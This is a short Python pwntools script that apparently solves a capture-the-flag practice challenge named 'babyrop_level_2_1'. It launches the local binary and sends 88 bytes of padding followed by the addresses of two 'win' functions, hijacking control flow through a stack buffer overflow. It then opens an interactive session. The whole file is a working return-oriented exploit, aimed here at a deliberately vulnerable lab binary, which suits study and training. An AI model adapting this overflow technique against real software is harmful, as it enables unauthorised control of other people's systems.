#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./babyrop_level_2_1", checksec=False)
r = process()

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*88
buf += p64(target.sym.win_stage_1)
buf += p64(target.sym.win_stage_2)
s(buf)

r.interactive()